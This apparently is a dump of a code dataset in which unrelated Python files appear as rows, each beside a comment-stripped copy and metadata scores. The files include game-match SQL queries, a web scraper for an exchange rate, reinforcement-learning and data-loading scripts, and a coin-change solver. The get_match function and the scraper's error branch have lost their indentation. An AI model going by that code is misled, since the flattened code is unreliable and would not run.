    rows = await context.database.fetch_all(query, values=values)
    players = {}
    for row in rows:
        players[(row['match_id'], row['number'])] = dict(
            match_id=row['match_id'],
            number=row['number'],
            name=row['name'],
            color_id=row['color_id'],
            winner=row['winner'],
            user=dict(
                id=row['user_id'],
                name=row['user_name'],
                platform_id=row['platform_id']
            )
        )
    return players
@dataloader_cached(ttl=None)
async def get_match(keys, context):
"""Get a match."""
player_query = """
select players.match_id, players.team_id, players.number, players.name, players.winner, teams.winner as t_winner,
player_colors.name as color, players.color_id,
civilizations.id as civilization_id, civilizations.name as civilization_name,
players.dataset_id, players.platform_id, players.user_id, players.user_name,
rate_snapshot, rate_before, rate_after, mvp, human, score, military_score,
economy_score, technology_score, society_score, units_killed, buildings_razed,
buildings_lost, units_converted, food_collected, wood_collected, stone_collected,
gold_collected, tribute_sent, tribute_received, trade_gold, relic_gold, units_lost,
feudal_time, castle_time, imperial_time,
extract(epoch from feudal_time)::integer as feudal_time_secs, extract(epoch from castle_time)::integer as castle_time_secs,
extract(epoch from imperial_time)::integer as imperial_time_secs, explored_percent, research_count,
total_wonders, total_castles, total_relics, villager_high,
people.id as person_id, people.country, people.name as person_name
from players join teams on players.team_id=teams.team_id and players.match_id=teams.match_id
join player_colors on players.color_id=player_colors.id
join civilizations on players.dataset_id=civilizations.dataset_id and players.civilization_id=civilizations.id
join datasets on players.dataset_id=datasets.id
left join platforms on players.platform_id=platforms.id
left join users on players.platform_id=users.platform_id and players.user_id=users.id
left join people on users.person_id=people.id
where players.match_id=any(:match_id)
"""
file_query = """
select id, match_id, size, original_filename, language, encoding, owner_number
from files where match_id=any(:match_id)
"""
match_query = """
select matches.id, map_name, rms_seed,
matches.dataset_id, datasets.name as dataset_name,
matches.platform_id, platforms.name as platform_name,
platforms.url as platform_url, platforms.match_url as platform_match_url,
matches.event_id, events.name as event_name,
matches.tournament_id, tournaments.name as tournament_name,
matches.series_id, series_metadata.name as series_name,
matches.ladder_id, ladders.name as ladder_name,
difficulties.name as difficulty,
game_types.name as type, matches.type_id,
map_reveal_choices.name as map_reveal_choice,
map_sizes.name as map_size,
speeds.name as speed,
starting_ages.name as starting_age,
starting_resources.name as starting_resources,
victory_conditions.name as victory_condition,
played, rated, diplomacy_type, team_size, platform_match_id,
cheats, population_limit, lock_teams, mirror, dataset_version, postgame, has_playback, duration::interval(0),
versions.name as version, extract(epoch from duration)::integer as duration_secs, winning_team_id,
game_version, save_version, build,
rms_seed, rms_custom, direct_placement, fixed_positions, guard_state, effect_quantity,
added
from matches
join versions on matches.version_id=versions.id
join datasets on matches.dataset_id=datasets.id
join difficulties on matches.difficulty_id=difficulties.id
join game_types on matches.type_id=game_types.id
join map_reveal_choices on matches.map_reveal_choice_id=map_reveal_choices.id
join map_sizes on matches.map_size_id=map_sizes.id
join speeds on matches.speed_id=speeds.id
left join platforms on matches.platform_id=platforms.id
left join starting_ages on matches.starting_age_id=starting_ages.id
left join starting_resources on matches.starting_resources_id=starting_resources.id
left join victory_conditions on matches.victory_condition_id=victory_conditions.id
left join ladders on matches.ladder_id=ladders.id and matches.platform_id=ladders.platform_id
left join events on matches.event_id=events.id
left join tournaments on matches.tournament_id=tournaments.id
left join series_metadata on matches.series_id=series_metadata.series_id
where matches.id=any(:id)
"""
matches, players, files = await asyncio.gather(
context.database.fetch_all(match_query, values={'id': keys}),
context.database.fetch_all(player_query, values={'match_id': keys}),
context.database.fetch_all(file_query, values={'match_id': keys})
)
output = {}
for match in matches:
match_id = match['id']
player_data = make_players(by_key(players, 'match_id'), match_id)
team_data, winning_team = make_teams(player_data, match_id)
output[match_id] = dict(
match,
players=player_data,
teams=team_data,
winning_team=winning_team,
minimap_link='/api/map/{}'.format(match_id),
event=dict(
id=match['event_id'],
name=match['event_name']
) if match['event_id'] else None,
tournament=dict(
id=match['tournament_id'],
name=match['tournament_name']
) if match['tournament_id'] else None,
series=dict(
id=match['series_id'],
name=match['series_name']
) if match['series_id'] else None,
files=make_files(player_data, by_key(files, 'match_id'), match_id),
dataset=dict(
id=match['dataset_id'],
name=match['dataset_name']
),
platform=dict(
id=match['platform_id'],
name=match['platform_name'],
url=match['platform_url'],
match_url=match['platform_match_url']
) if match['platform_id'] else None,
ladder=dict(
id=match['ladder_id'],
name=match['ladder_name'],
platform_id=match['platform_id']
) if match['ladder_id'] else None
)
return output
| en | 0.756861 | Matches. Get match chat. select name, player_number, message, origination, audience, timestamp, color_id from chat join players on chat.player_number=players.number and chat.match_id=players.match_id where chat.match_id=:match_id order by id Get researches. select name, started::interval(0), finished::interval(0), player_number, match_id, extract(epoch from started)::integer as started_secs, extract(epoch from finished)::integer as finished_secs from research join technologies on research.technology_id=technologies.id and research.dataset_id=technologies.dataset_id where {} order by started Make player structures. Make team structures. Make files structures. Get basic player data. select players.match_id, players.number, players.name, players.winner, players.color_id, players.user_id, players.platform_id, players.user_name from players where {} Get a match. select players.match_id, players.team_id, players.number, players.name, players.winner, teams.winner as t_winner, player_colors.name as color, players.color_id, civilizations.id as civilization_id, civilizations.name as civilization_name, players.dataset_id, players.platform_id, players.user_id, players.user_name, rate_snapshot, rate_before, rate_after, mvp, human, score, military_score, economy_score, technology_score, society_score, units_killed, buildings_razed, buildings_lost, units_converted, food_collected, wood_collected, stone_collected, gold_collected, tribute_sent, tribute_received, trade_gold, relic_gold, units_lost, feudal_time, castle_time, imperial_time, extract(epoch from feudal_time)::integer as feudal_time_secs, extract(epoch from castle_time)::integer as castle_time_secs, extract(epoch from imperial_time)::integer as imperial_time_secs, explored_percent, research_count, total_wonders, total_castles, total_relics, villager_high, people.id as person_id, people.country, people.name as person_name from players join teams on players.team_id=teams.team_id and 
players.match_id=teams.match_id join player_colors on players.color_id=player_colors.id join civilizations on players.dataset_id=civilizations.dataset_id and players.civilization_id=civilizations.id join datasets on players.dataset_id=datasets.id left join platforms on players.platform_id=platforms.id left join users on players.platform_id=users.platform_id and players.user_id=users.id left join people on users.person_id=people.id where players.match_id=any(:match_id) select id, match_id, size, original_filename, language, encoding, owner_number from files where match_id=any(:match_id) select matches.id, map_name, rms_seed, matches.dataset_id, datasets.name as dataset_name, matches.platform_id, platforms.name as platform_name, platforms.url as platform_url, platforms.match_url as platform_match_url, matches.event_id, events.name as event_name, matches.tournament_id, tournaments.name as tournament_name, matches.series_id, series_metadata.name as series_name, matches.ladder_id, ladders.name as ladder_name, difficulties.name as difficulty, game_types.name as type, matches.type_id, map_reveal_choices.name as map_reveal_choice, map_sizes.name as map_size, speeds.name as speed, starting_ages.name as starting_age, starting_resources.name as starting_resources, victory_conditions.name as victory_condition, played, rated, diplomacy_type, team_size, platform_match_id, cheats, population_limit, lock_teams, mirror, dataset_version, postgame, has_playback, duration::interval(0), versions.name as version, extract(epoch from duration)::integer as duration_secs, winning_team_id, game_version, save_version, build, rms_seed, rms_custom, direct_placement, fixed_positions, guard_state, effect_quantity, added from matches join versions on matches.version_id=versions.id join datasets on matches.dataset_id=datasets.id join difficulties on matches.difficulty_id=difficulties.id join game_types on matches.type_id=game_types.id join map_reveal_choices on 
matches.map_reveal_choice_id=map_reveal_choices.id join map_sizes on matches.map_size_id=map_sizes.id join speeds on matches.speed_id=speeds.id left join platforms on matches.platform_id=platforms.id left join starting_ages on matches.starting_age_id=starting_ages.id left join starting_resources on matches.starting_resources_id=starting_resources.id left join victory_conditions on matches.victory_condition_id=victory_conditions.id left join ladders on matches.ladder_id=ladders.id and matches.platform_id=ladders.platform_id left join events on matches.event_id=events.id left join tournaments on matches.tournament_id=tournaments.id left join series_metadata on matches.series_id=series_metadata.series_id where matches.id=any(:id) | 2.516911 | 3 |
App/service/job.py | dataminion/ScienceManager | 0 | 6612443 | <filename>App/service/job.py
#service.job
from service.data.provider import Provider as dataSource
from service.process.provider import Provider as Process
class Job(object):
    """Service layer coordinating job lookup, registration and execution."""

    def __init__(self, log, conn):
        # Keep the logger and build the data-access layer once up front.
        self._log = log
        self._source = dataSource(log, conn)

    def get_job_details(self, workflow, name):
        """Look up the program details for *name* within *workflow*."""
        return self._source.get_program_details(workflow, name)

    def register_job(self, workflow_id, user_id):
        """Reserve and return the next batch number for this workflow/user."""
        return self._source.reserve_next_batch_number(workflow_id, user_id)

    def setup_job(self, workflow_id):
        """Fetch the actions configured for the given workflow."""
        return self._source.get_program_actions(workflow_id)

    def process_job_items(self, tasks):
        """Run each task's action through a processor built for its type."""
        for item in tasks:
            handler = Process(self._log, item.action.type)
            handler.handle_process(item.action.text)
| <filename>App/service/job.py
#service.job
from service.data.provider import Provider as dataSource
from service.process.provider import Provider as Process
class Job(object):
    """Service layer coordinating job lookup, registration and execution."""

    def __init__(self, log, conn):
        # Keep the logger and build the data-access layer once up front.
        self._log = log
        self._source = dataSource(log, conn)

    def get_job_details(self, workflow, name):
        """Look up the program details for *name* within *workflow*."""
        return self._source.get_program_details(workflow, name)

    def register_job(self, workflow_id, user_id):
        """Reserve and return the next batch number for this workflow/user."""
        return self._source.reserve_next_batch_number(workflow_id, user_id)

    def setup_job(self, workflow_id):
        """Fetch the actions configured for the given workflow."""
        return self._source.get_program_actions(workflow_id)

    def process_job_items(self, tasks):
        """Run each task's action through a processor built for its type."""
        for item in tasks:
            handler = Process(self._log, item.action.type)
            handler.handle_process(item.action.text)
| en | 0.739755 | #service.job A service to execute external applications | 2.771868 | 3 |
Longest Consecutive Sequence.py | TommyWongww/killingCodes | 1 | 6612444 | # @Time : 2019/6/1 23:31
# @Author : shakespere
# @FileName: Longest Consecutive Sequence.py
'''
128. Longest Consecutive Sequence
Hard
Given an unsorted array of integers, find the length of the longest consecutive elements sequence.
Your algorithm should run in O(n) complexity.
Example:
Input: [100, 4, 200, 1, 3, 2]
Output: 4
Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.
'''
class Solution(object):
    def longestConsecutive(self, nums):
        """
        Return the length of the longest run of consecutive integers in nums.

        O(n): each run is walked exactly once, starting only from its low end.
        (The previous version shadowed the builtin ``dict`` and walked both
        directions from every unvisited element.)

        :type nums: List[int]
        :rtype: int
        """
        values = set(nums)  # O(1) membership tests; also dedupes input
        longest = 0
        for v in values:
            # Only start counting at the low end of a run, so each run is
            # traversed once overall instead of once per element.
            if v - 1 in values:
                continue
            end = v
            while end + 1 in values:
                end += 1
            longest = max(longest, end - v + 1)
        return longest
| # @Time : 2019/6/1 23:31
# @Author : shakespere
# @FileName: Longest Consecutive Sequence.py
'''
128. Longest Consecutive Sequence
Hard
Given an unsorted array of integers, find the length of the longest consecutive elements sequence.
Your algorithm should run in O(n) complexity.
Example:
Input: [100, 4, 200, 1, 3, 2]
Output: 4
Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.
'''
class Solution(object):
    def longestConsecutive(self, nums):
        """
        Return the length of the longest run of consecutive integers in nums.

        O(n): each run is walked exactly once, starting only from its low end.
        (The previous version shadowed the builtin ``dict`` and walked both
        directions from every unvisited element.)

        :type nums: List[int]
        :rtype: int
        """
        values = set(nums)  # O(1) membership tests; also dedupes input
        longest = 0
        for v in values:
            # Only start counting at the low end of a run, so each run is
            # traversed once overall instead of once per element.
            if v - 1 in values:
                continue
            end = v
            while end + 1 in values:
                end += 1
            longest = max(longest, end - v + 1)
        return longest
| en | 0.783118 | # @Time : 2019/6/1 23:31 # @Author : shakespere # @FileName: Longest Consecutive Sequence.py 128. Longest Consecutive Sequence
Hard
Given an unsorted array of integers, find the length of the longest consecutive elements sequence.
Your algorithm should run in O(n) complexity.
Example:
Input: [100, 4, 200, 1, 3, 2]
Output: 4
Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4. :type nums: List[int]
:rtype: int | 4.005896 | 4 |
enaml/widgets/focus_tracker.py | timgates42/enaml | 26 | 6612445 | #------------------------------------------------------------------------------
# Copyright (c) 2014, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import ForwardTyped, Typed
from enaml.core.declarative import d_
from .toolkit_object import ToolkitObject, ProxyToolkitObject
from .widget import Widget
class ProxyFocusTracker(ProxyToolkitObject):
    """ The abstract definition of a proxy FocusTracker object.
    """
    #: A reference to the FocusTracker declaration. ForwardTyped defers the
    #: type lookup because FocusTracker is defined later in this module.
    declaration = ForwardTyped(lambda: FocusTracker)
class FocusTracker(ToolkitObject):
    """ An object which tracks the global application focus widget.
    """
    #: The application widget with the current input focus. This will
    #: be None if no widget in the application has focus, or if the
    #: focused widget does not directly correspond to an Enaml widget.
    #: Declared read-only (writable=False); presumably updated by the
    #: toolkit proxy -- confirm against the backend implementation.
    focused_widget = d_(Typed(Widget), writable=False)
    #: A reference to the ProxyFocusTracker object.
    proxy = Typed(ProxyFocusTracker)
| #------------------------------------------------------------------------------
# Copyright (c) 2014, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import ForwardTyped, Typed
from enaml.core.declarative import d_
from .toolkit_object import ToolkitObject, ProxyToolkitObject
from .widget import Widget
class ProxyFocusTracker(ProxyToolkitObject):
    """ The abstract definition of a proxy FocusTracker object.
    """
    #: A reference to the FocusTracker declaration. ForwardTyped defers the
    #: type lookup because FocusTracker is defined later in this module.
    declaration = ForwardTyped(lambda: FocusTracker)
class FocusTracker(ToolkitObject):
    """ An object which tracks the global application focus widget.
    """
    #: The application widget with the current input focus. This will
    #: be None if no widget in the application has focus, or if the
    #: focused widget does not directly correspond to an Enaml widget.
    #: Declared read-only (writable=False); presumably updated by the
    #: toolkit proxy -- confirm against the backend implementation.
    focused_widget = d_(Typed(Widget), writable=False)
    #: A reference to the ProxyFocusTracker object.
    proxy = Typed(ProxyFocusTracker)
| en | 0.709818 | #------------------------------------------------------------------------------ # Copyright (c) 2014, Nucleic Development Team. # # Distributed under the terms of the Modified BSD License. # # The full license is in the file COPYING.txt, distributed with this software. #------------------------------------------------------------------------------ The abstract definition of a proxy FocusTracker object. #: A reference to the FocusTracker declaration. An object which tracks the global application focus widget. #: The application widget with the current input focus. This will #: be None if no widget in the application has focus, or if the #: focused widget does not directly correspond to an Enaml widget. #: A reference to the ProxyFocusTracker object. | 1.9787 | 2 |
PPO/Test.py | hojunkim13/master2048 | 0 | 6612446 | from Agent import Agent
import numpy as np
import os, sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from Env import Game2048_wrapper
from _2048 import Game2048
import pygame
# Files used by the environment wrapper to persist scores / saved states.
p1 = os.path.join("save", '2048_.score')
p2 = os.path.join("save", '2048_.%d.state')
# Set up the pygame window used to render the 2048 board.
screen = pygame.display.set_mode((Game2048.WIDTH, Game2048.HEIGHT))
pygame.init()
pygame.display.set_caption("2048!")
pygame.display.set_icon(Game2048.icon(32))
env_name = '2048'
env = Game2048_wrapper(screen, p1, p2)
# Observation: single-channel 4x4 board; four move directions.
state_dim = (1,4,4)
action_dim = 4
n_episode = 250
load = False       # NOTE(review): unused in this evaluation script
save_freq = 10     # NOTE(review): unused in this evaluation script
# PPO hyperparameters, needed only to construct the Agent before loading
# trained weights (names suggest: discount, GAE lambda, actor/critic learning
# rates, rollout length, update epochs, clip range -- confirm in Agent).
gamma = 0.99
lmbda = 0.95
alpha = 5e-4
beta = 5e-4
time_step = 20
K_epochs = 3
epsilon = 0.1
agent = Agent(state_dim, action_dim, alpha, beta, gamma, lmbda, epsilon, time_step, K_epochs)
# Put both networks in evaluation mode and load the trained parameters.
agent.actor.eval()
agent.critic.eval()
agent.load(env_name)
if __name__ == "__main__":
    score_list = []
    mas_list = []   # moving-average score, one entry per episode
    for e in range(n_episode):
        done = False
        score = 0
        state = env.reset(True)
        # Play one full game, rendering every step.
        while not done:
            env.draw()
            action, prob = agent.get_action(state)
            state_, reward, done = env.step(action)
            score += reward
            state = state_
        # episode finished: record score and a 100-episode running average
        score_list.append(score)
        average_score = np.mean(score_list[-100:])
        mas_list.append(average_score)
        print(f'[{e+1}/{n_episode}] [Score: {score:.1f}] [Average Score: {average_score:.1f}]')
    env.close()
| from Agent import Agent
import numpy as np
import os, sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from Env import Game2048_wrapper
from _2048 import Game2048
import pygame
# Files used by the environment wrapper to persist scores / saved states.
p1 = os.path.join("save", '2048_.score')
p2 = os.path.join("save", '2048_.%d.state')
# Set up the pygame window used to render the 2048 board.
screen = pygame.display.set_mode((Game2048.WIDTH, Game2048.HEIGHT))
pygame.init()
pygame.display.set_caption("2048!")
pygame.display.set_icon(Game2048.icon(32))
env_name = '2048'
env = Game2048_wrapper(screen, p1, p2)
# Observation: single-channel 4x4 board; four move directions.
state_dim = (1,4,4)
action_dim = 4
n_episode = 250
load = False       # NOTE(review): unused in this evaluation script
save_freq = 10     # NOTE(review): unused in this evaluation script
# PPO hyperparameters, needed only to construct the Agent before loading
# trained weights (names suggest: discount, GAE lambda, actor/critic learning
# rates, rollout length, update epochs, clip range -- confirm in Agent).
gamma = 0.99
lmbda = 0.95
alpha = 5e-4
beta = 5e-4
time_step = 20
K_epochs = 3
epsilon = 0.1
agent = Agent(state_dim, action_dim, alpha, beta, gamma, lmbda, epsilon, time_step, K_epochs)
# Put both networks in evaluation mode and load the trained parameters.
agent.actor.eval()
agent.critic.eval()
agent.load(env_name)
if __name__ == "__main__":
    score_list = []
    mas_list = []   # moving-average score, one entry per episode
    for e in range(n_episode):
        done = False
        score = 0
        state = env.reset(True)
        # Play one full game, rendering every step.
        while not done:
            env.draw()
            action, prob = agent.get_action(state)
            state_, reward, done = env.step(action)
            score += reward
            state = state_
        # episode finished: record score and a 100-episode running average
        score_list.append(score)
        average_score = np.mean(score_list[-100:])
        mas_list.append(average_score)
        print(f'[{e+1}/{n_episode}] [Score: {score:.1f}] [Average Score: {average_score:.1f}]')
    env.close()
| none | 1 | 2.384148 | 2 | |
webEuroDollar.py | Dauphine-demo/exo1-powa | 0 | 6612447 | # -*- coding: utf-8 -*-
"""
<NAME>
Ceci est un script qui permet de faire un peu
de web scraping.
"""
import bs4
import requests
# Récupérer la page web
url = 'http://www.boursorama.com/taux-de-change-euro-dollar-eur-usd'
maRequete = requests.get(url)
if( maRequete.status_code != 200 ):
print("Erreur lors de la récupération. Code d'erreur :", maRequete.status_code)
exit(1)
print(maRequete.url)
# Le contenu de la page est dans maRequete.text
# Analyser la page web avec BS4
soupe = bs4.BeautifulSoup(maRequete.text, "lxml")
soupe2 = soupe.find('div', attrs={'id': 'fiche_cours_details'})
conversion = soupe2.find('table').find('tr').findAll('td')[1].find('b').find('span').text
# Afficher la valeur de la conversion Euro/Dollar
print(conversion)
| # -*- coding: utf-8 -*-
"""
<NAME>
Ceci est un script qui permet de faire un peu
de web scraping.
"""
import bs4
import requests
# Récupérer la page web
url = 'http://www.boursorama.com/taux-de-change-euro-dollar-eur-usd'
maRequete = requests.get(url)
if( maRequete.status_code != 200 ):
print("Erreur lors de la récupération. Code d'erreur :", maRequete.status_code)
exit(1)
print(maRequete.url)
# Le contenu de la page est dans maRequete.text
# Analyser la page web avec BS4
soupe = bs4.BeautifulSoup(maRequete.text, "lxml")
soupe2 = soupe.find('div', attrs={'id': 'fiche_cours_details'})
conversion = soupe2.find('table').find('tr').findAll('td')[1].find('b').find('span').text
# Afficher la valeur de la conversion Euro/Dollar
print(conversion)
| fr | 0.934111 | # -*- coding: utf-8 -*- <NAME>
Ceci est un script qui permet de faire un peu
de web scraping. # Récupérer la page web # Le contenu de la page est dans maRequete.text # Analyser la page web avec BS4 # Afficher la valeur de la conversion Euro/Dollar | 3.182513 | 3 |
experiment/loaders/cropmapping.py | LeonDong1993/TractableDE-ContCNet | 0 | 6612448 | import numpy as np
from utmLib import utils
from pdb import set_trace
def load_data(options):
    """Load the crop-mapping CSV and drop unusable / highly-correlated columns.

    (Fix: the original ``return data`` line was fused with dataset-extraction
    residue, which made the module unparsable.)

    Parameters
    ----------
    options : object with ``root_dir`` and ``data_path`` attributes locating
        the comma-separated data file.

    Returns
    -------
    numpy.ndarray
        Float matrix with the filtered columns.
    """
    print('Loading crop mapping data .....')
    data_file = '{}/{}'.format(options.root_dir, options.data_path)
    # read_data
    data = np.loadtxt(data_file, delimiter= ',', dtype = 'float')
    # Hand-picked column indices judged uninformative for this dataset
    # -- TODO confirm the provenance of these lists.
    useless_attr = [172, 126, 134, 164, 170, 171, 133, 163, 125, 132, 162, 167, 169, 98, 124, 166, 168, 128, 129, 131, 100, 99, 101, 161,130, 158, 159, 120]
    selector = utils.notin(range(data.shape[1]), useless_attr)
    data = data[:,selector]
    # Second pass: drop highly-correlated columns; note these indices are
    # relative to the already-reduced matrix.
    high_corr_elim = [1, 3, 131, 132, 6, 5, 137, 141, 142, 15, 16, 17, 34, 36, 39, 43, 44, 53, 54, 55, 61, 75, 86, 87, 92, 94, 100, 102, 103]
    selector = utils.notin(range(data.shape[1]), high_corr_elim)
    data = data[:,selector]
    return data
from utmLib import utils
from pdb import set_trace
def load_data(options):
    """Load the crop-mapping CSV and drop unusable / highly-correlated columns.

    (Fix: the original ``return data`` line was fused with dataset-extraction
    residue, which made the module unparsable.)

    Parameters
    ----------
    options : object with ``root_dir`` and ``data_path`` attributes locating
        the comma-separated data file.

    Returns
    -------
    numpy.ndarray
        Float matrix with the filtered columns.
    """
    print('Loading crop mapping data .....')
    data_file = '{}/{}'.format(options.root_dir, options.data_path)
    # read_data
    data = np.loadtxt(data_file, delimiter= ',', dtype = 'float')
    # Hand-picked column indices judged uninformative for this dataset
    # -- TODO confirm the provenance of these lists.
    useless_attr = [172, 126, 134, 164, 170, 171, 133, 163, 125, 132, 162, 167, 169, 98, 124, 166, 168, 128, 129, 131, 100, 99, 101, 161,130, 158, 159, 120]
    selector = utils.notin(range(data.shape[1]), useless_attr)
    data = data[:,selector]
    # Second pass: drop highly-correlated columns; note these indices are
    # relative to the already-reduced matrix.
    high_corr_elim = [1, 3, 131, 132, 6, 5, 137, 141, 142, 15, 16, 17, 34, 36, 39, 43, 44, 53, 54, 55, 61, 75, 86, 87, 92, 94, 100, 102, 103]
    selector = utils.notin(range(data.shape[1]), high_corr_elim)
    data = data[:,selector]
    return data
src/importance_evaluation/feat_imp_mnist.py | mjpekala/shearlet-scattering | 2 | 6612449 | # <NAME>, ETH Zurich, 2016
import feat_importance_extractor as fe
# Scattering-network layout used to unmap flat feature indices back to
# (direction, scale, pixel) positions: 3 directions, scales per layer, and
# the flattened per-layer image sizes.
num_directions = 3
num_scales = [3, 3, 3, 0]
img_sizes = [28*28, 28*28, 14*14, 7*7]
# Standard 28x28 MNIST: load the pickled model (presumably a random forest,
# given the 'rf' prefix -- confirm) and write feature importances to CSV.
rffile = 'rfmnist.pkl'
outname = 'mnist_featimp'
rf = fe.load_pkl(rffile)
fe.unmap_feat_vec_csv(rf,outname,num_directions,num_scales,img_sizes)
# Same procedure for the 36x36 'disp' MNIST variant (larger input images).
img_sizes = [36*36, 36*36, 18*18, 9*9]
rffile = 'rfmnistdisp.pkl'
outname = 'mnist_disp_featimp'
rf = fe.load_pkl(rffile)
fe.unmap_feat_vec_csv(rf,outname,num_directions,num_scales,img_sizes)
| # <NAME>, ETH Zurich, 2016
import feat_importance_extractor as fe
# Scattering-network layout used to unmap flat feature indices back to
# (direction, scale, pixel) positions: 3 directions, scales per layer, and
# the flattened per-layer image sizes.
num_directions = 3
num_scales = [3, 3, 3, 0]
img_sizes = [28*28, 28*28, 14*14, 7*7]
# Standard 28x28 MNIST: load the pickled model (presumably a random forest,
# given the 'rf' prefix -- confirm) and write feature importances to CSV.
rffile = 'rfmnist.pkl'
outname = 'mnist_featimp'
rf = fe.load_pkl(rffile)
fe.unmap_feat_vec_csv(rf,outname,num_directions,num_scales,img_sizes)
# Same procedure for the 36x36 'disp' MNIST variant (larger input images).
img_sizes = [36*36, 36*36, 18*18, 9*9]
rffile = 'rfmnistdisp.pkl'
outname = 'mnist_disp_featimp'
rf = fe.load_pkl(rffile)
fe.unmap_feat_vec_csv(rf,outname,num_directions,num_scales,img_sizes)
| en | 0.462854 | # <NAME>, ETH Zurich, 2016 | 1.916767 | 2 |
kerasy/search/smart_pay.py | iwasakishuto/Keras-Imitation | 4 | 6612450 | <gh_stars>1-10
# coding: utf-8
from ..utils import flush_progress_bar
def breakdown(combs):
    """Pretty-print a table of coin / count / subtotal rows with a total line."""
    coins = sorted(set(combs))
    counts = [combs.count(c) for c in coins]
    subtotals = [c * k for c, k in zip(coins, counts)]
    grand_total = sum(subtotals)
    # Column widths: wide enough for both headers and the largest values.
    w_coin = max([len("coins")] + [len(str(c)) for c in coins])
    w_cnt = max([len("number")] + [len(str(k)) for k in counts])
    w_pay = max([len("pay"), len(str(grand_total))] + [len(str(s)) for s in subtotals])
    rule = w_coin + w_cnt + w_pay + 2

    def show(c, k, p):
        # Coin column centered; count and pay columns right-aligned.
        print(f"{c:^{w_coin}}|{k:>{w_cnt}}|{p:>{w_pay}}")

    show('coins', 'number', 'pay')
    print("=" * rule)
    for c, k, p in zip(coins, counts, subtotals):
        show(c, k, p)
    print("-" * rule)
    show('total', sum(counts), grand_total)
def smart_pay(coins, total, limit=None, verbose=1, retval=False):
    """
    Find the minimum number of coin combinations by using Dynamic Programming.

    The first element of ``coins`` is a "restricted" coin usable at most
    ``limit`` times; all remaining coins are unrestricted.

    @params coins: (int list) Coins. All values must be distinct; coins[0]
        is the restricted coin.
    @params total: (int) Amount of Payment.
    @params limit: (int) Maximum number of times a restricted coin can be used.
        ``None`` means effectively unlimited.
    @params verbose: (int) Truthy values print the limit note and progress.
    @params retval: (bool) If True, return the list of coins used; otherwise
        pretty-print the result via ``breakdown`` and return None.
    """
    total += 1 # because the DP table is 0-origin: index t == amount t.
    if len(set(coins)) < len(coins):
        raise ValueError("All elements of `coins` must be different integers.")
    restricted = coins[0]
    free_coins = coins[1:]
    if limit is None:
        # Large enough that the restricted coin alone could cover `total`.
        limit = total//restricted+1
    elif verbose:
        print(f'{restricted} coin can only be used up to {limit} times at the same time.')
    # Initialization.
    B = [0 for _ in range(total)] # Memory for Traceback (predecessor amount).
    # m[t] = minimum number of free coins that pay exactly amount t.
    m = [0 if t==0 else 1 if t in free_coins else float('inf') for t in range(total)]
    # Recursion: reach amount t by adding one free coin to a smaller amount.
    for t in range(1,total):
        cands = [m[t-coin] if (t-coin)>=0 else float('inf') for coin in free_coins]
        if not sum([e!=float('inf') for e in cands])==0:
            minnum = min(cands)
            # Record best count and the predecessor amount for traceback.
            m[t],B[t] = [(e+1,t-coin) for e,coin in zip(cands,free_coins) if e==minnum][0]
        flush_progress_bar(t-1, total-1, metrics={"minimum": m[t]}, verbose=verbose)
    # Try every allowed count l of restricted coins; the remainder is paid with
    # free coins (m[-1-restricted*l] indexes amount total - restricted*l).
    ms = [(l,m[-1-restricted*l]+l) for l in range(limit+1) if restricted*l<=total]
    num_restricted, num_total = min(ms, key=lambda x:x[1])
    idx = total-1-restricted*num_restricted
    combs = [restricted for _ in range(num_restricted)]
    # Walk the traceback table back to amount 0, collecting free coins used.
    while idx:
        last = B[idx]
        combs.append(idx-last)
        idx = last
    if retval:
        return combs
    else:
        breakdown(combs)
| # coding: utf-8
from ..utils import flush_progress_bar
def breakdown(combs):
    """Pretty-print a table of coin / count / subtotal rows with a total line."""
    coins = sorted(set(combs))
    counts = [combs.count(c) for c in coins]
    subtotals = [c * k for c, k in zip(coins, counts)]
    grand_total = sum(subtotals)
    # Column widths: wide enough for both headers and the largest values.
    w_coin = max([len("coins")] + [len(str(c)) for c in coins])
    w_cnt = max([len("number")] + [len(str(k)) for k in counts])
    w_pay = max([len("pay"), len(str(grand_total))] + [len(str(s)) for s in subtotals])
    rule = w_coin + w_cnt + w_pay + 2

    def show(c, k, p):
        # Coin column centered; count and pay columns right-aligned.
        print(f"{c:^{w_coin}}|{k:>{w_cnt}}|{p:>{w_pay}}")

    show('coins', 'number', 'pay')
    print("=" * rule)
    for c, k, p in zip(coins, counts, subtotals):
        show(c, k, p)
    print("-" * rule)
    show('total', sum(counts), grand_total)
def smart_pay(coins, total, limit=None, verbose=1, retval=False):
    """
    Find the minimum number of coin combinations by using Dynamic Programming.

    (Fix: the final ``breakdown(combs)`` line was fused with dataset-extraction
    residue, which made the module unparsable.)

    The first element of ``coins`` is a "restricted" coin usable at most
    ``limit`` times; all remaining coins are unrestricted.

    @params coins: (int list) Coins. All values must be distinct; coins[0]
        is the restricted coin.
    @params total: (int) Amount of Payment.
    @params limit: (int) Maximum number of times a restricted coin can be used.
        ``None`` means effectively unlimited.
    @params verbose: (int) Truthy values print the limit note and progress.
    @params retval: (bool) If True, return the list of coins used; otherwise
        pretty-print the result via ``breakdown`` and return None.
    """
    total += 1 # because the DP table is 0-origin: index t == amount t.
    if len(set(coins)) < len(coins):
        raise ValueError("All elements of `coins` must be different integers.")
    restricted = coins[0]
    free_coins = coins[1:]
    if limit is None:
        # Large enough that the restricted coin alone could cover `total`.
        limit = total//restricted+1
    elif verbose:
        print(f'{restricted} coin can only be used up to {limit} times at the same time.')
    # Initialization.
    B = [0 for _ in range(total)] # Memory for Traceback (predecessor amount).
    # m[t] = minimum number of free coins that pay exactly amount t.
    m = [0 if t==0 else 1 if t in free_coins else float('inf') for t in range(total)]
    # Recursion: reach amount t by adding one free coin to a smaller amount.
    for t in range(1,total):
        cands = [m[t-coin] if (t-coin)>=0 else float('inf') for coin in free_coins]
        if not sum([e!=float('inf') for e in cands])==0:
            minnum = min(cands)
            # Record best count and the predecessor amount for traceback.
            m[t],B[t] = [(e+1,t-coin) for e,coin in zip(cands,free_coins) if e==minnum][0]
